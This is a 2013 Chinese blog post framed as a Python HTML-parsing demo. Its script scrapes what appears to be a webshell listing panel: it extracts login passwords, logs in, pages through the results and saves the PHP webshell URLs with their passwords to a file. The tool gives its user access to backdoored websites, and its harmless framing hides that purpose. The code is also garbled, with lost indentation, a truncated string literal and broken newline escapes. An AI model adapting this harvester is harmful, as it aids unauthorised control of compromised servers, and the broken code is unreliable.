11月
5
2013
0x01 今天写了个示例程序,用python解析网页,htmlparse是核心,配合urllib2,解析页面中的某些特定标签
0x02 代码如下,作用是用来爬取页面信息的,
#coding=utf-8
'''
Created on 2013-11-5
@author: lenovo
'''
from HTMLParser import HTMLParser
import time
import urllib2
import urllib
import time
from urllib2 import urlopen
loginPass=[]
check=0
webshell=[]
temp=0
savefile=''
pagenum=0
class MyParser(HTMLParser):
"""一个简单的HTMLparser的例子"""
def handle_decl(self, decl):
"""处理头文档"""
HTMLParser.handle_decl(self, decl)
#print decl
def handle_starttag(self, tag, attrs):
"""处理起始标签"""
global loginPass
global check
global webshell
global temp
HTMLParser.handle_starttag(self, tag, attrs)
#if not HTMLParser.get_starttag_text(self).endswith("/>"):
#print ""
if tag=='tr' and self.rawdata.find("""
check=1
if tag=='a' and check==1 and len(attrs)>1 and attrs[1][1][-3:]=='php' :
#print attrs[1][1]
z=[]
z.append(attrs[1][1])
webshell.append(z)
temp=len(webshell)
if tag=='input' and check==1 and len(attrs)>3 and attrs[3][0]=='value' and attrs[1][0]=='style':
#print attrs
webshell[temp-1].append(attrs[3][1])
if tag=='input' and check==1 and len(attrs)==3 and attrs[2][0]=='value' and attrs[1][0]=='style' and attrs[0][1]=='text':
#print attrs
webshell[temp-1].append(attrs[2][1])
if tag=='input':
#print attrs
if attrs[0][0]=='type' and attrs[0][1]=='checkbox' and attrs[1][1]=='pwd[]' :
#print attrs[2][1]
loginPass.append(attrs[2][1]) # 处理图片
#for attr in attrs:
# for t in attr:
# print t
def handle_data(self, data):
"""处理文本元素"""
HTMLParser.handle_data(self, data)
#print data,
def handle_endtag(self, tag):
"""处理结束标签"""
HTMLParser.handle_endtag(self, tag)
if tag=='tr':
check=0
#if not HTMLParser.get_starttag_text(self).endswith("/>"):
#print "",tag,">"
def handle_startendtag(self, tag, attrs):
"""处理自闭标签"""
HTMLParser.handle_startendtag(self, tag, attrs)
#print HTMLParser.get_starttag_text(self)
def handle_comment(self, data):
"""处理注释"""
HTMLParser.handle_comment(self, data)
#print data
def close(self):
HTMLParser.close(self)
#print "parser over"
def Post(url,s):
try:
s1=urllib.quote(s,"=&")
#print s1
req = urllib2.Request(url,s1)
resp = urllib2.urlopen(req,timeout=10)
web=resp.read()
#print strlist
except Exception:
return ""
return web
def Get(url):
try:
#s1=urllib.quote(s,"=#"()[],@'&\")
#print s1
req = urllib2.Request(url)
resp = urllib2.urlopen(req,timeout=60)
web=resp.read()
#print strlist
except Exception:
return ""
return web
def saveWebshell():
file=open(savefile,'w')
for i in webshell:
print i
file.write(i[0]+','+i[1]+'n')
file.close()
print '******* Save SuccessFul ********'
#print 'Save SuccessFul'
#def getInfo(page):
def getPage(url,num):
if num==0:
if len(loginPass)!=0:
print '******* Login ********'
passWd='pwd[]='+loginPass[2]+'&pwd[]='+loginPass[4]
demo=MyParser()
demo.feed(Post(url,passWd))
demo.close()
print '******* Get Page '+str(num)+' ********'
urlNew=url+'&p='+str(num)
demo=MyParser()
demo.feed(Get(urlNew))
demo.close()
#def getTotal(url):
def login(url):
print '*******Get Password********'
demo=MyParser()
demo.feed(Get(url))
demo.close()
def autoSearch(url):
login(url)
#print loginPass
#getPage(url,0)
num=pagenum
for i in xrange(0,num+1):
page=getPage(url,i)
#getInfo(page)
print '******* Scan Over ********'
saveWebshell()
if __name__ == '__main__':
pagenum=9
savefile=r'E:work profitprofitjavaicetoolstoolsWebShellphp168.txt'
autoSearch('http://www.XXXX.com/core/centerxxxxx.php?s=php168')
pass
3,464 次访问过